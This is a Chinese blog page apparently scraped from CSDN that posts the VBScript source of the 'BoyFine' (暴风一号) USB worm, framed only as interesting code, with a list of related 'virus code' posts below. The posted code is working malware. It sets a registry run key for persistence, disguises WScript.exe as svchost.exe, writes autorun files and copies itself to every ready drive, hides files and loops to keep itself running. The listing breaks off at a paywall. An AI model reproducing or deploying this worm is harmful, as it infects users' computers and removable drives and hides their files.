高质量病毒——暴风一号(BoyFine)代码.vbs

最新推荐文章于 2024-07-20 16:45:44 发布
最新推荐文章于 2024-07-20 16:45:44 发布
阅读量2.2k 收藏 15
点赞数 2
文章标签: windows microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aczxZ/article/details/126232210
版权

最近我看到了一些很有趣的代码(主要是因为他是病毒),来,话不多说
直接上代码,希望对大家有帮助,此外,我要对它的名称进行说明,他的
中文名是暴风一号,英文名是BoyFine

On Error Resume Next
Dim Fso, WshShell
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
Set WshShell = CreateObject("wScRipT.SHelL")
Call Main
Sub Main()
    On Error Resume Next
    Dim Args, VirusLoad, VirusAss
    Set Args = WScript.Arguments
    VirusLoad = GetMainVirus(1)
    VirusAss = GetMainVirus(0)
    Call VirusAlert
    Call MonitorSystem
End Sub
Sub MonitorSystem()
    On Error Resume Next
    Dim ProcessNames, ExeFullNames
    VBSFullNames = Array(GetMainVirus(1))

    Do
        Call InvadeSystem(GetMainVirus(1), GetMainVirus(0))
        Call KeepProcess(VBSFullNames)
        WScript.Sleep 3000
    Loop

End Sub
Sub InvadeSystem(VirusLoadPath, VirusAssPath)
    On Error Resume Next
    Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
    Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
    File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
    IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
    MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
    MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
    HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
    HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
    HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
    VirusCode = GetCode(WScript.ScriptFullName)
    Version = 1
    HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
    HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"

    For Each Drive In Fso.Drives

        If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
            DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
            Call CreateAutoRun(Drive.DriveLetter, DiskVirusName)
            Call InfectRoot(Drive.DriveLetter, DiskVirusName)
        End If

    Next

    If Fso.FileExists(VirusAssPath) = True Or Fso.FileExists(VirusLoadPath) = True Or Fso.FileExists(HostFilePath) = True Then
        If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
            Call SetHiddenAttr(HostFilePath)
            Call CreateFile(VirusCode, VirusAssPath)
            Call CreateFile(VirusCode, VirusLoadPath)
            Call CopyFile(HostSourcePath, HostFilePath)
        Else
            Call SetHiddenAtt
最低0.47元/天 解锁文章
aczxZ
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
个人电脑中挖矿病毒程序 一把梭直接定位到人
Python_paipai的博客
05-14 596
朋友抱怨自己的服务器非常卡,因为存储了很多项目资料和集成了众多环境。作为好友,我自然义无反顾地帮他检查。原本以为仅需进行简单的杀毒和文件整理便足够,但最终这个过程花费了不少时间。正好借此机会记录下整个过程,并写成这篇文章。首先,确定问题的根源,确认系统中了木马。清除系统中的所有可疑进程、启动项、计划任务、后门以及异常账户。使用审计主机和Web日志,定位入侵的具体入口。通过反追踪技术获取到肉鸡权限,并发现外部连接的地址。尽力溯源,确定具体人员身份(虽然不一定能百分百确认)。
Windows小病毒:吓人但无危害
2301_77765180的博客
07-15 783
免责声明:运行本文中的项目导致与朋友闹翻、被对象甩、电脑冒烟,本人概不负责😂。本系列小病毒可用记事本编辑,编辑好后命名为“惊喜.vbs”,双击即可运行。注意:该文件只能命名为boo.bat,不然会报错。运行有风险,尝试需谨慎。连截屏都截不了,只能拍照了。本系列用记事本编辑后命名为“名字.bat”,双击运行即可。只要你按“否”,弹窗就不会关闭。解决办法很简单,关机就行了。这时,按“确定”即可退出。二、批处理文件(bat)版。(2)大佬级:打开窗口。(3)大神级:死循环。
VBS病毒(弹窗病毒
SUUUzhengji的博客
05-02 2868
(打开记事本复制后后缀名改成.vbs,引号内的内容可更改)对电脑无害,任务管理器可关闭,重启可关闭。
vbs病毒代码(无害)
zym95661的博客
12-13 1318
代码vbs病毒代码(无害)
vbs计算机病毒代码,求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。...
weixin_29563497的博客
07-28 1239
满意答案mioscat2017.08.23采纳率:45%等级:9已帮助:1467人那废话不说,问这个如何?不懂可以问我On Error Resume Nextdim avest,xufso,wscrtSet avest = WScript.Createobject("WScript.Shell")Set wscrt = WScript.Createobject("WScript.Shell...
科学计算机病毒代码大全,有哪些计算机病毒代码
热门推荐
weixin_35419402的博客
06-19 3万+
计算机病毒也是要生成的,那么计算机病毒代码有些什么呢?下面是学习啦小编收集整理的有哪些计算机病毒代码,希望对大家有帮助~~计算机病毒代码介绍一:void main(){while(1){}}//死循环,电脑用不了或者这样void main(){while(1){char *a=new char(1024);}}//吃光你的内存还能这样#include#includevoid main(){.......
python简单的病毒编程代码,如何用python做恶搞病毒
K12345611717的博客
02-19 1608
def take_photoes(self): while True: time.sleep(10) # 图片路径,同时带上路径+时间 photo_path = r'%s/%s.jpeg' % (self.base_dir, time.strftime('%Y-%m-%d_%H_%M_%S')) cap = None try: # VideoCapture()中第一个参数是摄像头标号,默认情况电脑自带摄像头索引为0,外置为1.2.3…然后服务器套接字继续处于监听,接收其他客户端套接字的连接请求。
usbcleaner
11-17
FolderCure中增加Autorun.vbs System.exe系列病毒的专门处理模块(可通过FolderCure查杀) USBCleaner主程序界面作一处调整以及智能侦测中一处代码错误 新增106个新U盘类病毒的查杀,其中包括autorun.vbs system....
文件变快捷方式专杀软件
09-21
6. PCHome_download.html和暴风一号(BoyFine)U盘蠕虫病毒专杀工具_PChome下载介绍.txt:这两个文件可能是关于BoyFineKiller的下载链接页面和使用说明。PCHome是一个知名的科技资讯网站,提供软件下载服务。用户可以...
vbs计算机病毒代码,一段病毒常用的VBS代码
weixin_36298146的博客
07-28 2074
On error resume nextDim fso,wshell,curfolder,curdristr,curdriSet fso=createobject("scripting.filesystemobject")Set wshell=CreateObject("WScript.shell")Set curfolder=fso.GetFolder(".")curdristr=Left(WS...
暴风一号病毒处理
09-29
U盘中的文件及文件夹都变成了快捷方式,但是通过文件的快捷方式仍然可以对相对应的文件进行相关的处理 ,这是暴风一号的恶意软件 ,通过此工具可以进行一定的处理 有时杀毒软件会误报,请予以信任
vbs类蠕虫病毒
HI_REY的博客
03-20 1万+
代码仅供参考,如有因攻击他人电脑导致的损失作者概不负责!
vbs计算机病毒代码,vbs病毒的简单例子源代码解析
weixin_35985795的博客
07-28 1746
vbs病毒的简单例子源代码解析2007-03-26 00:00:00 作者:vbs病毒的简单例子源代码解析说明:作者对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持...
暴风一号病毒(1kb病毒),U盘只剩快捷方式,文件消失
weixin_43670158的博客
12-09 2784
暴风一号病毒(1kb病毒),U盘只剩快捷方式,文件消失表现解决恢复详解(先使用杀毒软件杀毒,win10为例) 小病毒,别慌! 表现 U盘文件消失,U盘中的文件都没了,只剩1kb或者2kb的快捷方式 修改注册表 ,当使用一些文件时,会驱动病毒运行; 遍历文件夹,遍历之后,把你的文件全隐藏,再建立一个快捷方式,快捷方式可以驱动病毒 关闭弹出光驱,调戏你 锁定计算机,凉~ 解决 杀毒,杀毒软件查杀...
科学计算机病毒代码大全,计算机病毒代码有哪些
weixin_39600291的博客
06-15 1万+
计算机病毒也是要生成的,那么计算机病毒代码有些什么呢?下面由学习啦小编给你做出详细的计算机病毒代码介绍!希望对你有帮助!计算机病毒代码介绍一:void main(){while(1){}}//死循环,电脑用不了或者这样void main(){while(1){char *a=new char(1024);}}//吃光你的内存还能这样#include#includevoid main(){........
关于计算机病毒代码,常用的电脑病毒代码
weixin_39953629的博客
07-12 7351
该楼层疑似违规已被系统折叠隐藏此楼查看此楼on error resume nextset fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置set dir2=fs.getspecialfold...
编写一款2D CAD/CAM软件(二十一)生产ASCII ART Logo
最新发布
Arthur...J的博客
07-20 733
发挥你的想象力、艺术创造力,在各种位图编辑软件中生产软件Logo的位图,例如位图名称为logo.png.然后打开ascii.txt文件,查看根据位图生成的ASCII ART Logo.利用QCommandLineParser来显示ASCII ART Logo.1) 安装jp2a工具:sudo apt install jp2a。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值